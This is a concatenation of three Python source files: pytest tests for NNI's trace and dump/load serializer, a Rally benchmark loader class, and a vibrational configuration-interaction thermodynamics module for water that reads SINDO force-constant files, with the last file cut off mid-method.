    obj = SimpleClass(1, 2)
    assert obj._a == 1
    assert obj._b == 2

    payload = nni.dump(obj)
    assert '"__kwargs__": {"a": 1, "b": 2}' in payload
    assert '"__symbol__"' in payload

    obj = nni.load(payload)
    assert obj._a == 1
    assert obj._b == 2
def test_external_class():
    """Trace classes defined outside this module (stdlib and torch)."""
    from collections import OrderedDict

    d = nni.trace(kw_only=False)(OrderedDict)([('a', 1), ('b', 2)])
    assert d['a'] == 1
    assert d['b'] == 2
    assert nni.dump(d) == '{"a": 1, "b": 2}'

    conv = nni.trace(torch.nn.Conv2d)(3, 16, 3)
    assert conv.in_channels == 3
    assert conv.out_channels == 16
    assert conv.kernel_size == (3, 3)
    assert nni.dump(conv) == \
        r'{"__symbol__": "path:torch.nn.modules.conv.Conv2d", ' \
        r'"__kwargs__": {"in_channels": 3, "out_channels": 16, "kernel_size": 3}}'

    conv = nni.load(nni.dump(conv))
    assert conv.kernel_size == (3, 3)
def test_nested_class():
    """A traced instance may itself be an argument of another traced instance."""
    inner = SimpleClass(1, 2)
    outer = SimpleClass(inner)
    assert outer._a._a == 1

    restored = nni.load(nni.dump(outer))
    assert 'SimpleClass object at' in repr(restored)
    assert restored._a._a == 1
def test_unserializable():
    """Untraced objects fall back to the byte-payload path but still round-trip."""
    original = UnserializableSimpleClass()
    restored = nni.load(nni.dump(original))
    assert restored._a == 1
def test_function():
    """Tracing plain functions and factory functions."""
    t = nni.trace(math.sqrt, kw_only=False)(3)
    assert 1 < t < 2
    assert t.trace_symbol == math.sqrt
    assert t.trace_args == [3]

    t = nni.load(nni.dump(t))
    assert 1 < t < 2
    assert not is_traceable(t)  # trace not recovered, expected, limitation

    def simple_class_factory(bb=3.):
        return SimpleClass(1, bb)

    t = nni.trace(simple_class_factory)(4)
    ts = nni.dump(t)
    assert '__kwargs__' in ts

    t = nni.load(ts)
    assert t._a == 1
    assert is_traceable(t)

    t = t.trace_copy()
    assert is_traceable(t)
    assert t.trace_symbol(10)._b == 10
    assert t.trace_kwargs['bb'] == 4
    assert is_traceable(t.trace_copy())
class Foo:
    """Untraced helper with a large list attribute and value equality."""

    def __init__(self, a, b=1):
        self.aa = a
        self.bb = [b + 1 for _ in range(1000)]

    def __eq__(self, other):
        return self.aa == other.aa and self.bb == other.bb
def test_custom_class():
    """Dump/load equality for a user-defined class, including nested tracing."""
    module = nni.trace(Foo)(3)
    assert nni.load(nni.dump(module)) == module

    module = nni.trace(Foo)(b=2, a=1)
    assert nni.load(nni.dump(module)) == module

    # Untraced inner instance: only attribute contents can be checked.
    module = nni.load(nni.dump(nni.trace(Foo)(Foo(1), 5)))
    assert module.bb[0] == module.bb[999] == 6

    # Traced inner instance: full equality is recoverable.
    module = nni.trace(Foo)(nni.trace(Foo)(1), 5)
    assert nni.load(nni.dump(module)) == module
# NOTE: intentional redefinition — the tests below exercise the serializer
# against a class object that has been rebound at module level.
class Foo:
    """Untraced helper with a large list attribute and value equality."""

    def __init__(self, a, b=1):
        self.aa = a
        self.bb = [b + 1 for _ in range(1000)]

    def __eq__(self, other):
        return self.aa == other.aa and self.bb == other.bb
def test_basic_unit_and_custom_import():
    """Serialize classes imported from a sibling package and retiarii units."""
    module = ImportTest(3, 0.5)
    ss = nni.dump(module)
    assert ss == r'{"__symbol__": "path:imported.model.ImportTest", "__kwargs__": {"foo": 3, "bar": 0.5}}'
    assert nni.load(nni.dump(module)) == module

    import nni.retiarii.nn.pytorch as nn
    module = nn.Conv2d(3, 10, 3, bias=False)
    ss = nni.dump(module)
    assert ss == r'{"__symbol__": "path:torch.nn.modules.conv.Conv2d", "__kwargs__": {"in_channels": 3, "out_channels": 10, "kernel_size": 3, "bias": false}}'
    assert nni.load(ss).bias is None
def test_dataset():
    """DataLoader/MNIST round-trips through nni dump/load, with and without transforms."""
    dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True)
    dataloader = nni.trace(DataLoader)(dataset, batch_size=10)
    expected = {
        "__symbol__": "path:torch.utils.data.dataloader.DataLoader",
        "__kwargs__": {
            "dataset": {
                "__symbol__": "path:torchvision.datasets.mnist.MNIST",
                "__kwargs__": {"root": "data/mnist", "train": False, "download": True}
            },
            "batch_size": 10
        }
    }
    print(nni.dump(dataloader))
    print(nni.dump(expected))
    assert nni.dump(dataloader) == nni.dump(expected)
    dataloader = nni.load(nni.dump(expected))
    assert isinstance(dataloader, DataLoader)

    def check_one_batch(loader):
        # One batch of 10 MNIST images: (10, 1, 28, 28) inputs, (10,) labels.
        x, y = next(iter(nni.load(nni.dump(loader))))
        assert x.size() == torch.Size([10, 1, 28, 28])
        assert y.size() == torch.Size([10])

    transform = nni.trace(transforms.Compose)([
        nni.trace(transforms.ToTensor)(),
        nni.trace(transforms.Normalize)((0.1307,), (0.3081,))
    ])
    dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True, transform=transform)
    check_one_batch(nni.trace(DataLoader)(dataset, batch_size=10))

    # Same pipeline, but with the inner transforms left untraced.
    transform = nni.trace(transforms.Compose)(
        [transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]
    )
    dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True, transform=transform)
    check_one_batch(nni.trace(DataLoader)(dataset, batch_size=10))
def test_pickle():
    """Plain pickle still works on serializer-aware classes, including ad-hoc attributes."""
    pickle.dumps(EmptyClass())
    restored = pickle.loads(pickle.dumps(SimpleClass(1)))
    assert restored._a == 1
    assert restored._b == 1
    original = SimpleClass(1)
    original.xxx = 3
    assert pickle.loads(pickle.dumps(original)).xxx == 3
@pytest.mark.skipif(sys.platform != 'linux', reason='https://github.com/microsoft/nni/issues/4434')
def test_multiprocessing_dataloader():
    """A traced dataset must survive pickling into DataLoader worker processes."""
    transform = nni.trace(transforms.Compose)(
        [transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]
    )
    dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True,
                               transform=transform)
    import nni.retiarii.evaluator.pytorch.lightning as pl
    batch_x, batch_y = next(iter(pl.DataLoader(dataset, batch_size=10, num_workers=2)))
    assert batch_x.size() == torch.Size([10, 1, 28, 28])
    assert batch_y.size() == torch.Size([10])
def _test_multiprocessing_dataset_worker(dataset):
    """Child-process check used by test_multiprocessing_dataset."""
    if sys.platform == 'linux':
        assert is_traceable(dataset)
    else:
        # Known limitation: off Linux the spawned copy arrives untraceable,
        # but it is still a valid Dataset instance.
        from torch.utils.data import Dataset
        assert isinstance(dataset, Dataset)
def test_multiprocessing_dataset():
    """A traced Dataset can be shipped to a multiprocessing child intact."""
    from torch.utils.data import Dataset
    import multiprocessing
    worker = multiprocessing.Process(target=_test_multiprocessing_dataset_worker,
                                     args=(nni.trace(Dataset)(),))
    worker.start()
    worker.join()
    assert worker.exitcode == 0
def test_type():
    """Bare types (not instances) serialize to a __nni_type__ path record."""
    adam_repr = '{"__nni_type__": "path:torch.optim.adam.Adam"}'
    assert nni.dump(torch.optim.Adam) == adam_repr
    assert nni.load(adam_repr) == torch.optim.Adam
    assert Foo == nni.load(nni.dump(Foo))
    floor_repr = '{"__nni_type__": "path:math.floor"}'
    assert nni.dump(math.floor) == floor_repr
    assert nni.load(floor_repr) == math.floor
def test_lightning_earlystop():
    """A traced EarlyStopping callback survives a Trainer dump/load cycle."""
    import nni.retiarii.evaluator.pytorch.lightning as pl
    from pytorch_lightning.callbacks.early_stopping import EarlyStopping
    trainer = pl.Trainer(callbacks=[nni.trace(EarlyStopping)(monitor="val_loss")])
    # A larger pickle payload budget is needed off Linux.
    limit = 4096 if sys.platform == 'linux' else 32768
    trainer = nni.load(nni.dump(trainer, pickle_size_limit=limit))
    assert any(isinstance(cb, EarlyStopping) for cb in trainer.callbacks)
def test_pickle_trainer():
    """A wrapped lightning Trainer remains plain-picklable."""
    import nni.retiarii.evaluator.pytorch.lightning as pl
    from pytorch_lightning import Trainer
    clone = pickle.loads(pickle.dumps(pl.Trainer(max_epochs=1)))
    assert isinstance(clone, Trainer)
def test_generator():
    """Tracing accepts generator arguments such as model.parameters()."""
    import torch.nn as nn
    import torch.optim as optim

    class Net(nn.Module):
        def __init__(self):
            super().__init__()
            self.conv = nn.Conv2d(3, 10, 1)

        def forward(self, x):
            return self.conv(x)

    optimizer = nni.trace(optim.Adam)(Net().parameters())
    print(optimizer.trace_kwargs)
def test_arguments_kind():
    """How positional and keyword arguments are recorded on traced callables."""
    def varargs_fn(a, b, *c, **d):
        pass

    traced = nni.trace(varargs_fn)(1, 2, 3, 4)
    assert traced.trace_args == [1, 2, 3, 4]
    assert traced.trace_kwargs == {}
    traced = nni.trace(varargs_fn)(a=1, b=2)
    assert traced.trace_kwargs == dict(a=1, b=2)
    # Mixed call: everything is normalized to kwargs — not perfect, but safe.
    traced = nni.trace(varargs_fn)(1, b=2)
    assert traced.trace_kwargs == dict(a=1, b=2)

    def kwonly_fn(a, *, b=3, c=5):
        pass

    traced = nni.trace(kwonly_fn)(1, b=2, c=3)
    assert traced.trace_kwargs == dict(a=1, b=2, c=3)

    import torch.nn as nn
    lstm = nni.trace(nn.LSTM)(2, 2)
    assert lstm.input_size == 2
    assert lstm.hidden_size == 2
    assert lstm.trace_args == [2, 2]
    lstm = nni.trace(nn.LSTM)(input_size=2, hidden_size=2)
    assert lstm.trace_kwargs == {'input_size': 2, 'hidden_size': 2}
def test_subclass():
    """Tracing interacts with inheritance: constructor kwargs are well-defined
    only for classes that are themselves decorated with @nni.trace."""
    @nni.trace
    class Super:
        def __init__(self, a, b):
            self._a = a
            self._b = b

    # Sub1 inherits from a traced base but is NOT decorated itself.
    class Sub1(Super):
        def __init__(self, c, d):
            super().__init__(3, 4)
            self._c = c
            self._d = d

    # Sub2 is decorated directly, so its own ctor kwargs are recorded.
    @nni.trace
    class Sub2(Super):
        def __init__(self, c, d):
            super().__init__(3, 4)
            self._c = c
            self._d = d

    obj = Sub1(1, 2)
    # There could be trace_kwargs for obj. Behavior is undefined.
    assert obj._a == 3 and obj._c == 1
    assert isinstance(obj, Super)
    obj = Sub2(1, 2)
    assert obj.trace_kwargs == {'c': 1, 'd': 2}
    assert issubclass(type(obj), Super)
    assert isinstance(obj, Super)
def test_get():
    """trace_copy() yields a symbolic copy whose kwargs can be edited before get()."""
    @nni.trace
    class Foo:
        def __init__(self, a=1):
            self._a = a

        def bar(self):
            return self._a + 1

    obj = Foo(3)
    assert nni.load(nni.dump(obj)).bar() == 4
    copy = obj.trace_copy()
    # The copy is symbolic: instance methods are unavailable until get().
    with pytest.raises(AttributeError):
        copy.bar()
    copy.trace_kwargs['a'] = 5
    materialized = copy.get()
    assert materialized.bar() == 6
    second = materialized.trace_copy()
    second.trace_kwargs['a'] = -1
    assert second.get().bar() == 0
def test_model_wrapper_serialize():
    """model_wrapper-decorated modules keep constructor kwargs through dump/load."""
    from nni.retiarii import model_wrapper

    @model_wrapper
    class Model(nn.Module):
        def __init__(self, in_channels):
            super().__init__()
            self.in_channels = in_channels

    assert nni.load(nni.dump(Model(3))).in_channels == 3
def test_model_wrapper_across_process():
    """Run the wrapper round-trip in fresh interpreter processes (both modes)."""
    script = os.path.join(os.path.dirname(__file__), 'imported', '_test_serializer_main.py')
    for mode in ('0', '1'):
        subprocess.run([sys.executable, script, mode], check=True)
|
rally.py | import os
from threading import Thread
import logging
import sys
from rally.cli.commands.task import TaskCommands
from rally.plugins import load as load_plugins
from rally.api import API
from rally.cli.commands.deployment import DeploymentCommands
from rally.plugins import load as load_plugins
from rally.exceptions import DBRecordNotFound
from enyo.config import Config
from . import BaseLoader
from enyo.utils.custom_logger import CustomLogger, DEFAULT_LOG_FORMAT
from enyo.reporters.rally import RallyReporter
config = Config()
LOG_FILE = os.path.join(config.get_value('log_dir'), 'loader-rally.log')
logger = CustomLogger(LOG_FILE, name=__name__)
RALLY_LOG_FILE = os.path.join(config.get_value('log_dir'), 'rally/task.log')
class Rally(BaseLoader):
    """Loader that drives a rally benchmark task on a background thread.

    Wraps the rally python API: creates (or reuses) a deployment, validates
    and creates a task, and can start, abort, report on, and tear it down.
    """

    def __init__(self, task_file, deployment=None, task_args=None, task_args_file=None, config_file=None):
        # NOTE(review): BaseLoader.__init__ is not called here; confirm the
        # base class has no required initialization.
        self.rally_api = API()
        self._modify_logger()
        self.task = TaskCommands()
        self.task_init_timeout = 200
        self.deployment_name = deployment
        self.task_file = task_file
        # The task runs on its own thread so start() returns immediately.
        self.task_thread = Thread(target=self.run)
        self.create_or_use_deployment()
        self.input_task = self.task._load_and_validate_task(self.rally_api, self.task_file,
                                                            raw_args=task_args,
                                                            args_file=task_args_file)
        self.task_instance = self.rally_api.task.create(deployment=self.deployment_name)
        self.task_id = self.task_instance["uuid"]

    def validate(self):
        """Validate the task file against the deployment and print the result."""
        print(self.task.validate(self.rally_api, self.task_file, self.deployment_name))

    def start(self):
        """Launch the rally task asynchronously."""
        logger.info("Starting thread for rally task")
        self.task_thread.start()

    def run(self):
        """Thread target: block while rally executes the task."""
        self.rally_api.task.start(deployment=self.deployment_name, config=self.input_task,
                                  task=self.task_id)

    def stop(self):
        """Abort the running rally task."""
        self.task.abort(self.rally_api, task_id=self.task_id)

    def task_status(self):
        """Return the current rally task status string."""
        task = self.rally_api.task.get(self.task_id)
        return task["status"]

    def deployment_status(self):
        """Return the current deployment status string."""
        deployment = self.rally_api.deployment.get(self.deployment_name)
        return deployment["status"]

    def wait_to_finish(self):
        """Block until the task thread completes."""
        logger.info("Waiting for rally thread to join")
        self.task_thread.join()
        logger.info("Finished rally thread")

    def generate_report(self, output_file):
        """Write HTML and JSON rally reports, then post-process the JSON one.

        :param output_file: path prefix; '.html' and '.json' are appended.
        """
        logger.info("Generating report")
        output_html = output_file + ".html"
        output_json = output_file + ".json"
        self.task.report(self.rally_api, self.task_id, out=output_html, out_format="html")
        self.task.report(self.rally_api, self.task_id, out=output_json, out_format="json")
        report = RallyReporter(output_json)
        report.generate_report()
        logger.info("Report generated")

    def create_or_use_deployment(self):
        """Reuse the named deployment if it exists, otherwise create it from the environment."""
        load_plugins()
        try:
            self.rally_api.deployment.get(self.deployment_name)
        except DBRecordNotFound:
            return DeploymentCommands().create(self.rally_api, self.deployment_name, fromenv=True)

    def destroy_deployment(self):
        """Delete the deployment backing this loader."""
        self.rally_api.deployment.destroy(self.deployment_name)

    def _modify_logger(self):
        """Redirect the rally library logger into RALLY_LOG_FILE.

        Bug fix: the original built a brand-new StreamHandler and passed it to
        removeHandler(), which is a no-op because that handler was never
        attached to the logger. Instead, strip any console StreamHandlers
        that are actually attached before adding the file handler.
        """
        rally_logger = logging.getLogger("rally")
        for handler in list(rally_logger.handlers):
            # FileHandler subclasses StreamHandler; only drop pure console handlers.
            if isinstance(handler, logging.StreamHandler) and not isinstance(handler, logging.FileHandler):
                rally_logger.removeHandler(handler)
        file_handler = logging.FileHandler(RALLY_LOG_FILE)
        file_handler.setFormatter(logging.Formatter(DEFAULT_LOG_FORMAT))
        rally_logger.addHandler(file_handler)
        rally_logger.propagate = False
|
vci_outputFCNM.py | import numpy as np
import math
import itertools
from collections import Counter
import sys
from numpy import linalg
from numba import jit
import time
from multiprocessing import Process, Queue
import csv
from itertools import permutations
#This function is obtained from pyvci plz see github resource code
#this function is for get the combination of all excited states
#I used max number of excited level for each mode
#eg: nmode = 3, maxlvl = 8(0-7) then we have 8*8*8 combines since 0 the vacuum one counts.
#if you want to get the sum max number of states like Dr.Yagi's code plz modify this fn.
#XXX add lambda verification
#XXX add different N (maxn)
#sys.stdout = open("vci_test_output.txt","w")
#function to generate the combination
t0 = time.time()
class VCIthermo:
    """Vibrational CI thermodynamics from a QFF (quartic force field).

    Reads SINDO-format force constants, builds harmonic-oscillator matrix
    elements, assembles and diagonalizes the VCI matrix, and evaluates
    partition-function thermodynamics (exact levels, Bose-Einstein, and
    finite-N Bose-Einstein). All quantities are in atomic units (kB = 1).
    """

    def __init__(self, Lambd, Temprt, maxn, calVCI):
        """Set up one calculation.

        :param Lambd: scaling factor applied to the anharmonic (cubic/quartic) terms
        :param Temprt: temperature grid in a.u.
        :param maxn: per-mode maximum excitation level (basis size per mode)
        :param calVCI: 1 to recompute the VCI matrix, else a saved-file flag
            (currently unused)

        NOTE(review): the VCI build/diagonalization and the ``thermoresults``
        table (consumed by ``Parallel_VCI``) are disabled in this revision;
        only the force-field read is executed.
        """
        Vref = 0          # potential energy at the reference geometry
        maxorder = 5      # operator slots: kinetic + Q..Q^4 (QFF)
        nmode = 3         # H2O: three normal modes (hard-coded for now)
        filepath = "../data/prop_no_3.hs"
        w_omega, FCQ3, FCQ4 = self.readSindoPES(filepath, nmode)

    def loopfn(self, n, maxn):
        """Return all excitation-level combinations for *n* modes.

        Each combination is a list of n quantum numbers in range(maxn); there
        are maxn**n of them, the vacuum state included, with the last mode
        varying slowest (matching the original recursive construction).
        """
        if n > 1:
            combos = []
            for level in range(maxn):
                for partial in self.loopfn(n - 1, maxn):
                    combos.append(partial + [level])
            return combos
        return [[level] for level in range(maxn)]

    def readSindoPES(self, filepath, nmode):
        """Parse harmonic, cubic and quartic force constants from a SINDO .hs file.

        :return: (w_omega, FCQ3, FCQ4) where w_omega holds the squared
            harmonic frequencies and FCQ3/FCQ4 the fully symmetrized
            cubic/quartic force-constant tensors, converted to atomic units.
            The coefficients include the 1/2, 1/3!, 1/4! prefactors.
        Also writes derivs_H2O_D{2,3,4}V.d_nm to the working directory.
        """
        w_omega = np.zeros(nmode)
        FCQ3 = np.zeros((nmode, nmode, nmode))
        FCQ4 = np.zeros((nmode, nmode, nmode, nmode))
        with open(filepath) as f:
            flines = f.readlines()
        for idx in range(len(flines)):
            tokens = flines[idx].split()
            if len(tokens) <= 1:
                continue
            tag = tokens[1]
            if tag == "Hessian(i,i)":
                tl = flines[idx + 1].split()
                if len(tl) == 2:
                    for i in range(nmode):
                        tl2 = flines[idx + 1 + i].split()
                        w_omega[i] = math.sqrt(float(tl2[1]))
            if tag == "Cubic(i,i,i)":
                for i in range(nmode):
                    tl = flines[idx + 1 + i].split()
                    FCQ3[int(tl[0]) - 1, int(tl[0]) - 1, int(tl[0]) - 1] = float(tl[1])
            if tag == "Cubic(i,i,j)":
                for i in range(nmode * 2):
                    tl = flines[idx + 1 + i].split()
                    listidx = [int(tl[0]) - 1, int(tl[0]) - 1, int(tl[1]) - 1]
                    for p in permutations(listidx):
                        FCQ3[p[0], p[1], p[2]] = float(tl[2])
            if tag == "Cubic(i,j,k)":
                tl = flines[idx + 1].split()
                # BUG FIX: the original used tl[0] twice and never read tl[1],
                # so the fully off-diagonal cubic constant landed on the wrong
                # tensor elements. The indices are the first three tokens.
                listidx = [int(tl[0]) - 1, int(tl[1]) - 1, int(tl[2]) - 1]
                for p in permutations(listidx):
                    FCQ3[p[0], p[1], p[2]] = float(tl[3])
            if tag == "Quartic(i,i,i,i)":
                for i in range(nmode):
                    tl = flines[idx + 1 + i].split()
                    FCQ4[int(tl[0]) - 1, int(tl[0]) - 1, int(tl[0]) - 1, int(tl[0]) - 1] = float(tl[1])
            if tag == "Quartic(i,i,j,j)":
                for i in range(nmode):
                    tl = flines[idx + 1 + i].split()
                    listidx = [int(tl[0]) - 1, int(tl[0]) - 1, int(tl[1]) - 1, int(tl[1]) - 1]
                    for p in permutations(listidx):
                        FCQ4[p[0], p[1], p[2], p[3]] = float(tl[2])
            if tag == "Quartic(i,i,i,j)":
                for i in range(nmode * 2):
                    tl = flines[idx + 1 + i].split()
                    listidx = [int(tl[0]) - 1, int(tl[0]) - 1, int(tl[0]) - 1, int(tl[1]) - 1]
                    for p in permutations(listidx):
                        FCQ4[p[0], p[1], p[2], p[3]] = float(tl[2])
            if tag == "Quartic(i,i,j,k)":
                for i in range(nmode):
                    tl = flines[idx + 1 + i].split()
                    listidx = [int(tl[0]) - 1, int(tl[0]) - 1, int(tl[1]) - 1, int(tl[2]) - 1]
                    for p in permutations(listidx):
                        FCQ4[p[0], p[1], p[2], p[3]] = float(tl[3])
        # Unit conversion: Angstrom -> Bohr (1.88973) and AMU -> electron mass
        # (1822.888486); frequencies end up stored as their squares.
        FCQ3 = np.true_divide(FCQ3, (1.88973 ** 3 * math.sqrt(1822.888486 ** 3)))
        FCQ4 = np.true_divide(FCQ4, (1.88973 ** 4 * math.sqrt(1822.888486 ** 4)))
        w_omega = np.true_divide(w_omega, math.sqrt(1.88973 ** 2 * 1822.888486))
        w_omega = w_omega ** 2
        self._write_normal_mode_files(nmode, w_omega, FCQ3, FCQ4)
        return w_omega, FCQ3, FCQ4

    def _write_normal_mode_files(self, nmode, w_omega, FCQ3, FCQ4):
        """Dump the unique (upper-triangular) derivatives to derivs_H2O_D{2,3,4}V.d_nm."""
        afix = "\n"
        with open("./derivs_H2O_D2V.d_nm", "w") as f:
            for i in range(nmode):
                for j in range(i, nmode):
                    if (i == j):
                        f.writelines(str(w_omega[i]) + afix)
                    else:
                        f.writelines(str(0) + afix)
        with open("./derivs_H2O_D3V.d_nm", "w") as f:
            for i in range(nmode):
                for j in range(i, nmode):
                    for k in range(j, nmode):
                        f.writelines(str(FCQ3[i, j, k]) + afix)
        with open("./derivs_H2O_D4V.d_nm", "w") as f:
            for i in range(nmode):
                for j in range(i, nmode):
                    for k in range(j, nmode):
                        for l in range(k, nmode):
                            f.writelines(str(FCQ4[i, j, k, l]) + afix)

    def EvaluationList(self, nmode, w_omega, maxn, maxorder):
        """Precompute harmonic-oscillator matrix elements <n|op|n'>.

        Indexed as Evlst[mode, operator, n, |n - n'|] with n the larger of the
        two quantum numbers. Operator slots: 0 = d^2/dQ^2 (combined with the
        -1/2 factor in VCImatrix), 1 = Q, 2 = Q^2, 3 = Q^3, 4 = Q^4
        (QFF, so the maximum operator order is 4).
        """
        Evlst = np.zeros((nmode, maxorder, maxn, maxorder))
        for i in range(nmode):
            for n in range(maxn):
                Evlst[i, 0, n, 0] = -w_omega[i] * (n + 0.5)
                Evlst[i, 0, n, 2] = w_omega[i] * math.sqrt(n * (n - 1)) / 2
                Evlst[i, 1, n, 1] = math.sqrt(n / 2 / w_omega[i])
                Evlst[i, 2, n, 0] = (n + 0.5) / w_omega[i]
                Evlst[i, 2, n, 2] = math.sqrt(n * (n - 1)) / 2 / w_omega[i]
                Evlst[i, 3, n, 1] = 3 * n / 2 / w_omega[i] * math.sqrt(n / 2 / w_omega[i])
                Evlst[i, 3, n, 3] = math.sqrt(n * (n - 1) * (n - 2)) / (2 * w_omega[i] * math.sqrt(2 * w_omega[i]))
                Evlst[i, 4, n, 0] = (6 * n * (n + 1) + 3) / 4 / (w_omega[i] ** 2)
                Evlst[i, 4, n, 2] = (n - 0.5) * math.sqrt(n * (n - 1)) / (w_omega[i] ** 2)
                Evlst[i, 4, n, 4] = math.sqrt(n * (n - 1) * (n - 2) * (n - 3)) / 4 / (w_omega[i] ** 2)
        return Evlst

    def VCImatrix(self, w_omega, linrComb, Evlst, nmode, maxorder, FCQ3, FCQ4, Vref, Lambd):
        """Assemble the (symmetric) VCI Hamiltonian in the product-HO basis.

        Each matrix element sums the kinetic term, the constant Vref, the
        harmonic potential (F_ii = w_i^2), and the Lambd-scaled cubic/quartic
        QFF terms; every term factorizes into per-mode integrals from Evlst,
        and any spectator-mode mismatch makes the whole product vanish.
        """
        leng = len(linrComb)
        VCImtrx = np.zeros((leng, leng))
        for i in range(leng):
            for j in range(i, leng):
                lhs = linrComb[i]
                rhs = linrComb[j]
                sumofoperator = 0
                # Kinetic energy: -(1/2) d^2/dQ^2, one mode at a time.
                for optidx in range(nmode):
                    multply = 1
                    for modeidx in range(nmode):
                        n = max(lhs[modeidx], rhs[modeidx])
                        diff = abs(lhs[modeidx] - rhs[modeidx])
                        if (modeidx == optidx and diff < maxorder):
                            multply *= -0.5 * Evlst[modeidx, 0, n, diff]
                        else:
                            # Spectator modes must match or the product is zero.
                            if (diff != 0):
                                multply *= 0
                                break
                    sumofoperator += multply
                # Constant Vref contributes only when all modes match.
                multply = 1
                for modeidx in range(nmode):
                    diff = abs(lhs[modeidx] - rhs[modeidx])
                    if (diff != 0):
                        multply *= 0
                        break
                sumofoperator += multply * Vref
                # Harmonic potential: gradients vanish, F_ii = w_i^2.
                for forceidx in range(nmode):
                    multply = 1
                    for modeidx in range(nmode):
                        diff = abs(lhs[modeidx] - rhs[modeidx])
                        n = max(lhs[modeidx], rhs[modeidx])
                        if (forceidx == modeidx and diff < maxorder):
                            multply *= 0.5 * Evlst[modeidx, 2, n, diff]
                        else:
                            if (diff != 0):
                                multply *= 0
                                break
                    multply *= (w_omega[forceidx] ** 2)
                    sumofoperator += multply
                # Cubic QFF term: sum_ijk F_ijk Qi Qj Qk / 3!, scaled by Lambd.
                for ii in range(nmode):
                    for jj in range(nmode):
                        for kk in range(nmode):
                            multply = 1
                            eachcount = Counter([ii, jj, kk])
                            for modeidx in range(nmode):
                                diff = abs(lhs[modeidx] - rhs[modeidx])
                                n = max(lhs[modeidx], rhs[modeidx])
                                numberofmodeinFC = eachcount[modeidx]
                                if (numberofmodeinFC != 0 and diff < maxorder):
                                    multply *= Evlst[modeidx, numberofmodeinFC, n, diff]
                                else:
                                    if (diff != 0):
                                        multply *= 0
                                        break
                            multply *= FCQ3[ii, jj, kk]
                            sumofoperator += Lambd * multply / 6
                # Quartic QFF term: sum_ijkl F_ijkl Qi Qj Qk Ql / 4!, scaled by Lambd.
                for ii in range(nmode):
                    for jj in range(nmode):
                        for kk in range(nmode):
                            for ll in range(nmode):
                                multply = 1
                                eachcount = Counter([ii, jj, kk, ll])
                                for modeidx in range(nmode):
                                    diff = abs(lhs[modeidx] - rhs[modeidx])
                                    n = max(lhs[modeidx], rhs[modeidx])
                                    numberofmodeinFC = eachcount[modeidx]
                                    if (numberofmodeinFC != 0 and diff < maxorder):
                                        multply *= Evlst[modeidx, numberofmodeinFC, n, diff]
                                    else:
                                        if (diff != 0):
                                            multply *= 0
                                            # Remaining factors would all be zero.
                                            break
                                multply *= FCQ4[ii, jj, kk, ll]
                                sumofoperator += Lambd * multply / 24
                VCImtrx[i, j] = VCImtrx[j, i] = sumofoperator
        return VCImtrx

    def DiagonalVCI(self, VCImtrx):
        """Diagonalize the symmetric VCI matrix.

        :return: (eigenvalues, eigenvectors) from numpy.linalg.eigh,
            eigenvalues in ascending order.
        """
        w, v = linalg.eigh(VCImtrx)
        print(w)
        return w, v

    def ThemoCalc(self, Temprt, Energylist, ret):
        """Canonical-ensemble thermodynamics from explicit energy levels.

        Fills ret in place with [partition function Xi, grand potential Omg,
        internal energy U, entropy S]; kB = 1 in atomic units.
        """
        b_beta = 1 / (Temprt)
        print(b_beta)
        GPF_Xi = 0
        print(np.sum(Energylist))
        for eachE in Energylist:
            GPF_Xi += math.exp(-b_beta * eachE)
        GP_Omg = -math.log(GPF_Xi) / b_beta
        IE_U = 0
        for eachE in Energylist:
            IE_U += eachE * math.exp(-b_beta * eachE)
        IE_U /= GPF_Xi
        entropy_S = 0
        for eachE in Energylist:
            entropy_S += eachE * math.exp(-b_beta * eachE)
        entropy_S /= (Temprt * GPF_Xi)
        entropy_S += math.log(GPF_Xi)
        ret[0] = GPF_Xi
        ret[1] = GP_Omg
        ret[2] = IE_U
        ret[3] = entropy_S
        print("Xi, Omg, U ,S is")
        # Consistency check: Omg should equal U - T*S.
        print("verify")
        print(GP_Omg)
        print(IE_U - Temprt * entropy_S)

    def Bose_EinsteinStat(self, Temprt, w_omega, ret):
        """Analytical Bose-Einstein thermodynamics for uncoupled harmonic modes
        (infinite level sum). Fills ret with [Xi, Omg, U, S] like ThemoCalc."""
        b_beta = 1 / Temprt
        # Occupation factors f_i = 1 / (1 - e^{-beta w_i}).
        f_i = np.zeros(len(w_omega))
        for i in range(len(w_omega)):
            f_i[i] = 1 / (1 - math.exp(-b_beta * w_omega[i]))
        print(f_i)
        GPF_Xi = 1
        for ii in range(len(w_omega)):
            GPF_Xi *= math.exp(-b_beta * w_omega[ii] / 2) * f_i[ii]
        GP_Omg = 0
        for eachw in w_omega:
            GP_Omg += 0.5 * eachw + math.log(1 - math.exp(-b_beta * eachw)) / b_beta
        IE_U = 0
        for eachw in w_omega:
            IE_U += 0.5 * eachw + eachw * math.exp(-b_beta * eachw) / (1 - math.exp(-b_beta * eachw))
        entropy_S = 0
        for eachw in w_omega:
            entropy_S += -math.log(1 - math.exp(-b_beta * eachw)) + eachw * math.exp(-b_beta * eachw) / (Temprt * (1 - math.exp(-b_beta * eachw)))
        ret[0] = GPF_Xi
        ret[1] = GP_Omg
        ret[2] = IE_U
        ret[3] = entropy_S

    def FiniteBE(self, Temprt, w_omega, maxn, ret):
        """Bose-Einstein thermodynamics with the level sum truncated at N = maxn - 1.

        Mirrors the finite basis used by the VCI calculation so both can be
        compared directly. Fills ret with [Xi, Omg, U, S].
        """
        N = maxn - 1
        b_beta = 1 / Temprt
        f_i = np.zeros(len(w_omega))
        tildef_i = np.zeros(len(w_omega))
        for i in range(len(w_omega)):
            f_i[i] = 1 / (1 - math.exp(-b_beta * w_omega[i]))
            tildef_i[i] = 1 / (1 - math.exp(-b_beta * (N + 1) * w_omega[i]))
        GPF_Xi = 1
        for eachw in w_omega:
            GPF_Xi *= math.exp(-b_beta * eachw / 2) * (1 - math.exp(-b_beta * (N + 1) * eachw)) / (1 - math.exp(-b_beta * eachw))
        GP_Omg = 0
        for ii in range(len(w_omega)):
            GP_Omg += 0.5 * w_omega[ii] - math.log(f_i[ii] / tildef_i[ii]) / b_beta
        IE_U = 0
        for ii in range(len(w_omega)):
            IE_U += 0.5 * w_omega[ii] + w_omega[ii] * (f_i[ii] - 1) - (N + 1) * w_omega[ii] * (tildef_i[ii] - 1)
        entropy_S = 0
        for ii in range(len(w_omega)):
